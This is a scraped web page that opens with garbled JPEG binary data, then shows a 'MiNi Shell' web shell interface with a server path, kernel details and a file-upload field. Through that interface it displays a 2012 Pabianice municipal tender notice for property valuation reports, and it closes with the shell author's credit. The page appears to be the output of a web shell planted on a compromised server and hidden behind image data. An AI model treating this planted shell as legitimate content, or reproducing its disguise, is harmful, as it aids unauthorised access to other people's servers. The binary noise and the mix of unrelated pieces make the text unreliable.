JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120104/3307-N-2012.html

<p class="kh_header"><b>Pabianice: wykonanie operatów szacunkowych</b><br>
<b>Numer ogłoszenia: 3307 - 2012; data zamieszczenia: 04.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Pabianice reprezentowana przez Prezydenta Miasta Pabianic Zbigniewa Dychto , ul. Zamkowa 16, 95-200 Pabianice, woj. łódzkie, tel. 042 2254600, faks 042 2254669.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pabianice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie operatów szacunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1).  Zamówienie obejmuje: wykonanie operatów szacunkowych określających wartość nieruchomości dla potrzeb Gminy Miejskiej Pabianice z podziałem na następujące zadania:
Zadanie nr I

1. Wykonanie operatów szacunkowych określających wartość nieruchomości gruntowych
    wraz z naniesieniami roślinnymi niezbędnych do ustalenia warunków zbywania i
    nabywania 

Termin wykonania powyższych operatów szacunkowych wynosi  14 dni kalendarzowych od dnia otrzymania zlecenia.
Operaty winny zawierać wyodrębnione wartości nieruchomości gruntowych, wartości  naniesień  roślinnych.

 Przewidywana ilość operatów ok. 25

2. Wykonanie operatów szacunkowych określających wartość prawa użytkowania wieczystego
    niezbędnych do określenia warunków sprzedaży na rzecz   użytkownika wieczystego oraz 
    ustalenia opłaty z tytułu  przekształcenia prawa użytkowania wieczystego w prawo własności

Termin wykonania powyższych operatów szacunkowych wynosi  14 dni kalendarzowych od dnia  otrzymania zlecenia
Przewidywana ilość operatów ok. 60


3.Wykonanie operatów szacunkowych określających wartość służebności oraz operatów szacunkowych określających obniżenie wartości nieruchomości z tytułu  wybudowania urządzeń infrastruktury technicznej    

Termin wykonania powyższych operatów szacunkowych wynosi  14 dni kalendarzowych od dnia  otrzymania zlecenia
    Przewidywana ilość operatów ok. 15 

Zadanie nr II

1. Wykonanie operatów szacunkowych określających wartość nieruchomości gruntowych
niezbędnych do aktualizacji opłaty rocznej z tytułu ich użytkowania wieczystego, opłat z tytułu trwałego zarządu i użytkowania

Termin wykonania powyższych operatów szacunkowych wynosi  21 dni kalendarzowych od dnia  otrzymania zlecenia
   
Przewidywana ilość operatów ok. 115

2 Wykonanie operatów szacunkowych niezbędnych do naliczenia opłaty adiacencekiej z tytułu 
    wzrostu wartości nieruchomości na  skutek jej podziału 

Termin wykonania powyższych operatów szacunkowych wynosi  21 dni kalendarzowych od dnia otrzymania 
zlecenia
    Przewidywana ilość operatów ok. 32

3. Wykonanie operatów szacunkowych określających wartość nieruchomości gruntowych
niezbędnych do ustalenia wysokości opłaty z tytułu wzrostu wartości nieruchomości na skutek
zmiany planu miejscowego.

Termin wykonania powyższych operatów szacunkowych wynosi  21 dni kalendarzowych od dnia  otrzymania zlecenia.
Przewidywana ilość operatów ok. 3


Zadanie nr III
Wykonanie operatów szacunkowych określających wartość budynków i innych naniesień
 budowlanych,  naniesień roślinnych i nieruchomości gruntowej.
1. Wykonanie operatów szacunkowych określających wartość naniesień budowlanych
    (ogrodzenia , utwardzenia terenu itp.), naniesień roślinnych i nieruchomości gruntowej
    Przewidywana ilość operatów ok. 15
2. Wykonanie  operatów szacunkowych określających wartość budynków o   kubaturze 
    do 500 m3,  naniesień roślinnych i nieruchomości gruntowej

    Przewidywana ilość operatów ok. 10

3. Wykonanie  operatów szacunkowych określających wartość budynków o kubaturze powyżej
     500 m 3, naniesień roślinnych i nieruchomości gruntowej

  Przewidywana ilość operatów ok. 5

Operaty winny zawierać wyodrębnione wartości nieruchomości gruntowej, wartości budynków i innych naniesień budowlanych oraz naniesień roślinnych. W przypadku nieruchomości zabudowanej kilkoma  budynkami naniesieniami budowlanymi operat winien zawierać informację o procentowym udziale wartości poszczególnych budynków i naniesień budowlanych  w całkowitej wartości budynków i naniesień.
Termin wykonania powyższych operatów szacunkowych wynosi  14 dni kalendarzowych od dnia
otrzymania zlecenia

Zadanie nr IV
1. Wykonanie operatów szacunkowych określających wartość lokali mieszkalnych i lokali
    użytkowych z pomieszczeniami przynależnymi i udziałem do nieruchomości gruntowej,
     nakładów ich  najemców,spółdzielczego własnościowego prawa do lokalu, udziału w budynkach
   niemieszkalnych

   Przewidywana ilość operatów ok. 50

Termin wykonania powyższych operatów szacunkowych wynosi  14 dni kalendarzowych od dnia otrzymania zlecenia.
Wykonanie zamówienia odbywać się będzie w pakietach obejmujących od 1 do 10 lokali z 14 dniowym terminem realizacji pakietu (maksymalnie 2 pakiety w ciągu miesiąca)

2) Wykonawca zobowiązany będzie dostarczyć zamawiającemu po 2 egzemplarze
    operatów szacunkowych. Ponadto  wykonawca będzie zobowiązany do dostarczenia  
     dokumentacji fotograficznej przedmiotu wyceny w formie płyty CD ( odrębnie dla każdej nieruchomości lub lokalu )..
3) Wykonawca zobowiązuje się w ramach wynagrodzenia wskazanego w formularzu ofertowym do  
umieszczenia stosownej klauzuli w operacie szacunkowym, potwierdzającej jego aktualność po  upływie 12 miesięcy od daty wykonania operatu ( art. 156 ust. 4 ustawy o gospodarce nieruchomościami), jeżeli odpowiada to stanowi faktycznemu
4). Podane ilości operatów szacunkowych są ilościami szacunkowymi. Faktyczna ilość operatów szacunkowych uzależniona będzie od potrzeb i możliwości Zamawiającego.
5) Szczegółowy zakres robót każdorazowo będzie określany w indywidualnych zleceniach.
6) CPV Główny przedmiot  701000002
7) Cena podana w ofercie musi obejmować całkowity zakres prac objęty przedmiotem
     zamówienia oraz wszelkie prace towarzyszące niezbędne do realizacji zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza  możliwość składania zamówień uzupełniających. 
    Zamówienia uzupełniające mogą dotyczyć wykonania operatów szacunkowych opisanych w ww. zadaniach dla zapewnienia płynności w bieżącej pracy Urzędu

Zamówienie  będzie wykonywane w okresie pomiędzy 1.01.2013 a datą podpisania nowych umów z rzeczoznawcami wyłonionymi w trybie przetargu dla wykonywania prac na 2013r. .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.10.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b>  Zamawiający nie wymaga składania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p> dysponują osobami zdolnymi do wykonania zadania 
 warunek ten zostanie spełniony jeżeli osoby które będą wykonywać zamówienie posiadają wymagane uprawnienia państwowe upoważniające do wykonywania wyżej określonych operatów szacunkowych zgodnie z obowiązującymi przepisami, w tym wykazują się co najmniej 3 letnim doświadczeniem zawodowym</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potencjał techniczny i sytuacja ekonomiczna i finansowa
  warunek ten zostanie spełniony jeżeli posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie wynikającym z ustawy o gospodarce nieruchomościami</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty - załącznik nr 4
2. formularz cenowy - załącznik  nr 5</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień  w zakresie 
      terminu realizacji zamówienia w przypadku zaistnienia następujących okoliczności:
a)  w następstwie, wykraczających poza terminy określone w KPA, procedur administracyjnych oraz innych terminów formalno - prawnych mających wpływ na terminy realizacji zamówienia;
b)  działania siły wyższej;
c)   wstrzymania prac lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego.
d) Zamawiający dopuszcza również zmianę w umowie wynikającą ze zmiany stawki podatku VAT.
e) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych problemami z jego zdolnością płatniczą lub warunkami organizacyjnymi bądź okolicznościami , które nie były możliwe do przewidzenia w chwili zawarcia umowy,
f)   z powodu zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron ,
g) z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez zamawiającego lub wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego,
h) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.pabianice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Gospodarki Nieruchomościami ul. Kościuszki 25, 95-200 Pabianice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2012 godzina 09:00, miejsce: u Zamawiającego: w Biurze Obsługi Interesantów, ul. Zamkowa 16, 95-200 Pabianice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> operaty szacunkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonanie operatów szacunkowych określających wartość nieruchomości gruntowych
    wraz z naniesieniami roślinnymi niezbędnych do ustalenia warunków zbywania i
    nabywania 

Operaty winny zawierać wyodrębnione wartości nieruchomości gruntowych, wartości  naniesień  roślinnych.

 Przewidywana ilość operatów ok. 25

2. Wykonanie operatów szacunkowych określających wartość prawa użytkowania wieczystego
    niezbędnych do określenia warunków sprzedaży na rzecz   użytkownika wieczystego oraz 
    ustalenia opłaty z tytułu  przekształcenia prawa użytkowania wieczystego w prawo własności


Przewidywana ilość operatów ok. 60


3.Wykonanie operatów szacunkowych określających wartość służebności oraz operatów szacunkowych określających obniżenie wartości nieruchomości z tytułu  wybudowania urządzeń infrastruktury technicznej    

    Przewidywana ilość operatów ok. 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.10.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> operaty szacunkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonanie operatów szacunkowych określających wartość nieruchomości gruntowych
niezbędnych do aktualizacji opłaty rocznej z tytułu ich użytkowania wieczystego, opłat z tytułu trwałego zarządu i użytkowania

   
Przewidywana ilość operatów ok. 115

2 Wykonanie operatów szacunkowych niezbędnych do naliczenia opłaty adiacencekiej z tytułu 
    wzrostu wartości nieruchomości na  skutek jej podziału 

    Przewidywana ilość operatów ok. 32

3. Wykonanie operatów szacunkowych określających wartość nieruchomości gruntowych
niezbędnych do ustalenia wysokości opłaty z tytułu wzrostu wartości nieruchomości na skutek
zmiany planu miejscowego.

Przewidywana ilość operatów ok. 3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.10.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> operaty szacunkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie operatów szacunkowych określających wartość budynków i innych naniesień
 budowlanych,  naniesień roślinnych i nieruchomości gruntowej.
1. Wykonanie operatów szacunkowych określających wartość naniesień budowlanych
    (ogrodzenia , utwardzenia terenu itp.), naniesień roślinnych i nieruchomości gruntowej
    Przewidywana ilość operatów ok. 15
2. Wykonanie  operatów szacunkowych określających wartość budynków o   kubaturze 
    do 500 m3,  naniesień roślinnych i nieruchomości gruntowej

    Przewidywana ilość operatów ok. 10

3. Wykonanie  operatów szacunkowych określających wartość budynków o kubaturze powyżej
     500 m 3, naniesień roślinnych i nieruchomości gruntowej

  Przewidywana ilość operatów ok. 5

Operaty winny zawierać wyodrębnione wartości nieruchomości gruntowej, wartości budynków i innych naniesień budowlanych oraz naniesień roślinnych. W przypadku nieruchomości zabudowanej kilkoma  budynkami naniesieniami budowlanymi operat winien zawierać informację o procentowym udziale wartości poszczególnych budynków i naniesień budowlanych  w całkowitej wartości budynków i naniesień..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.10.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> operaty szacunkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie operatów szacunkowych określających wartość lokali mieszkalnych i lokali
    użytkowych z pomieszczeniami przynależnymi i udziałem do nieruchomości gruntowej,
     nakładów ich  najemców,spółdzielczego własnościowego prawa do lokalu, udziału w budynkach
   niemieszkalnych

   Przewidywana ilość operatów ok. 50

Wykonanie zamówienia odbywać się będzie w pakietach obejmujących od 1 do 10 lokali z 14 dniowym terminem realizacji pakietu (maksymalnie 2 pakiety w ciągu miesiąca).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.10.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com